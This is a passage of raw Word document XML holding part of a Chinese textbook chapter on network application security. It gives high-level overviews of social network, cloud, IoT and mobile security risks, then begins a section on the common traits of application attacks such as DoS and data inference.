        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点实施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D960682" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）社交网络安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F849964" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>社交网络是指可以让人们彼此连接，分享信息的公共服务平台。可以发布照片、视频等内容与朋友沟通生活状态。主要的社交网络服务平台包括国内的微博、微信、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，还有国外的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linkedln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。国内外主流的社交网站有着庞大的用户群体，非常受欢迎。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD8E63" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于社交网络拥有天然的人物链接属性，因此在加入人物本身固有的属性，就可以轻而易举的分析出用户的更多信息，利用这些信息企业可以做一些商品的推广。比如，通过分析和你聊天频率，点赞程度分析出你的亲密好友关系，在通过你亲密好友的偏好推荐给你对应的商品，从而精准的投放广告，增加平台收入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C2596" w14:textId="7DD28847" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，如果相关社交网络的数据被用于恶意行为，那么造成的后果是不可以估量的</w:t>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61078835 \r \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被曝光，超过五千万的用户在不知情的情况下，被政治数据公司“剑桥分析（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cambridge Analytica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）”获取并利用，意图干预美国大选。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724AB91D" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）云计算安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC94A2" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>云计算时代已然到来，计算能力已经如同水和电一般，能够被我们随时使用，按需按量使用。依托于公有云设施，你只需轻松点击鼠标，即可购买处理器、内存、硬盘存储、网络带宽等资源，还可以伴随着需求的变化随时灵活调整用量，或增或减。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CED182" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>云计算和存储为用户提供了在第三方数据中心存储和处理数据的能力。组织在各种不同的服务模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SaaS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PaaS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IaaS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和部署模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>私有、公共、混合和社区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用云。与云计算相关安全问题分为两大类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>云提供商所面临的安全问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组织提供软件、平台或“基础架构即服务”通过“云”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和他们的客户所面临的安全问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公司或组织主机应用程序或数据存储在云上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。然而，责任是共同承担的。提供者必须确保其基础设施是安全的，客户的数据和应用程序受到保护，而用户必须采取措施加强其应用程序，并使用强密码和身份验证措施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03484D16" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>当组织选择在公有云上存储数据或托管应用程序时，它就失去了对承载其信息的服务器进行物理访问的能力。因此，潜在的敏感数据面临来自内部攻击的风险。根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年云安全联盟的一份报告，内部攻击是云计算七大威胁之一。因此，云服务提供商必须确保对物理访问数据中心服务器的员工进行彻底的背景检查。此外，必须经常监视数据中心的可疑活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1E4FE" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了节约资源、降低成本和保持效率，云服务提供商往往将多个客户的数据存储在同一台服务器上。因此，一个用户的私人数据有可能被其他用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>甚至可能是竞争对手</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看。为了应对这些敏感情况，云服务提供商应确保数据隔离和逻辑存储隔离。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A86E5" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在实现云基础设施中大量使用虚拟化给公共云服务的客户或租户带来了独特的安全问题。虚拟化改变了操作系统和底层硬件之间的关系——无论是计算、存储，还是网络。这引入了一个额外的层——虚拟化——它本身必须得到正确的配置、管理和保护。的具体问题包括可能危及虚拟化软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hypervisor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。虽然这些担忧主要是理论上的，但它们确实存在。例如，使用虚拟化软件的管理软件的管理员工作站发生漏洞，可能导致整个数据中心停机或按照攻击者的喜好重新配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B95C683" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>物联网安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED7D8D" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在采用物联网技术时，安全是最大的关注点，人们担心，在没有适当考虑涉及的深刻安全挑战和可能需要的监管变化的情况下，快速发展正在发生。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F63FE0" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大多数技术安全问题与传统的服务器、工作站和智能手机类似，包括弱认证、忘记更改默认凭证、设备间发送的未加密消息、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入和对安全更新的糟糕处理。然而，许多物联网设备在其可用的计算能力上存在严重的操作限制。这些限制常常使他们不能直接使用基本的安全措施，如实现防火墙或使用强密码系统加密他们与其他设备的通信，而且许多设备的低价格和消费者的关注使得健壮的安全补丁系统不常见。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FD29F4" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>物联网设备也进入新领域的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和通常可以控制物理设备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即使到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年有可能说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许多网络设备可能已经“监视人在自己家里”包括电视、厨房电器、相机和恒温器。汽车上的计算机控制设备，如刹车、发动机、锁、引擎盖和后备箱释放装置、喇叭、加热装置和仪表盘等，已被证明容易受到进入车载网络的攻击者的攻击。在某些情况下，车辆计算机系统是与互联网相连的，这使得它们可以被远程利用。到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2008</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年，安全研究人员已经证明了在没有授权的情况下远程控制心脏起搏器的能力。后来黑客演示了远程控制胰岛素泵和植入式心律转复除颤器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F243F" w14:textId="7BB54D7B" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全性差的联网可访问物联网设备也可能被破坏，从而攻击他人。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年，一场由运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C04C13">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C04C13">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00C04C13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61078690 \r \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00C04C13">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00C04C13">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C04C13">
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidR="00C04C13">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件的物联网设备驱动的分布式拒绝服务攻击导致一家</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供商和主要网站瘫痪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E6979" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）移动应用安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16013DB9" w14:textId="5694E425" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动安全，或者更具体地说移动设备安全，是保护智能手机、平板电脑和笔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>记本电脑免受与无线计算相关的威胁。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在移动计算中变得越来越重要。尤其令人担忧的是目前存储在智能手机上的个人和商业信息的安全性</w:t>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61079018 \r \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00591C8D">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A991DC" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>越来越多的用户和企业使用智能手机进行交流，同时也计划和组织用户的工作和私人生活。在公司内部，这些技术正在引起信息系统组织的深刻变化，因此它们已经成为新风险的来源。事实上，智能手机收集和汇编的敏感信息越来越多，必须控制这些信息的访问，以保护用户的隐私和公司的知识产权。所有的智能手机和电脑一样，都是攻击的首选目标。这些攻击利用了智能手机固有的弱点，这些弱点可能来自通信模式，如短消息服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(SMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，又名文本消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、多媒体消息服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(MMS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、蓝牙和事实上的全球移动通信标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GSM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。也有针对浏览器或操作系统软件漏洞的漏洞，而一些恶意软件依赖于普通用户的薄弱知识。安全对策正在开发并应用于智能手机，从不同软件层的安全，到向最终用户传播信息。从设计到使用，通过操作系统、软件层和可下载应用程序的开发，所有级别都有良好的实践。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D92D8" w14:textId="7AF87FA8" w:rsidR="00B3713F" w:rsidRDefault="001D451A" w:rsidP="001D451A">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>13.1</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全网络攻击的共性特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37072DDA" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过梳理分析上述的针对网络应用的攻击，可以发现这些攻击基本拥有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个共性特征。一是由于网络应用服务提供的资源是有限的，二是应用的信息会被合法或者不合法的访问，三是由于提供网络应用的技术和设备存在漏洞（网络协议栈，物理服务器等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2976E5AE" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）攻击者可以消耗大量应用资源导致其他用户无法访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515603C0" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在进行网络应用攻击时，一个恶意的攻击者可以超量的访问被使用的应用资源，如网络带宽、磁盘读写、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算等等，这样导致其他用户想要访问对应的资源时，就不能正常使用。这种攻击被称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，同时如果可以操控大量的分布式的机器的话，还可以进行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，造成应用的全面崩溃。如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全，物联网安全，云计算安全都面临对应的攻击风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDAB7C9" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）攻击者可以合法、或者不合法的获取应用数据、推理构造出目标数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C98E75" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于一些网络应用的数据是相互共享的，因此所有用户都可以合法的使用，然而这些通过合理的推断这些信息可以一定程度破坏用户隐私，这种攻击形式存在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
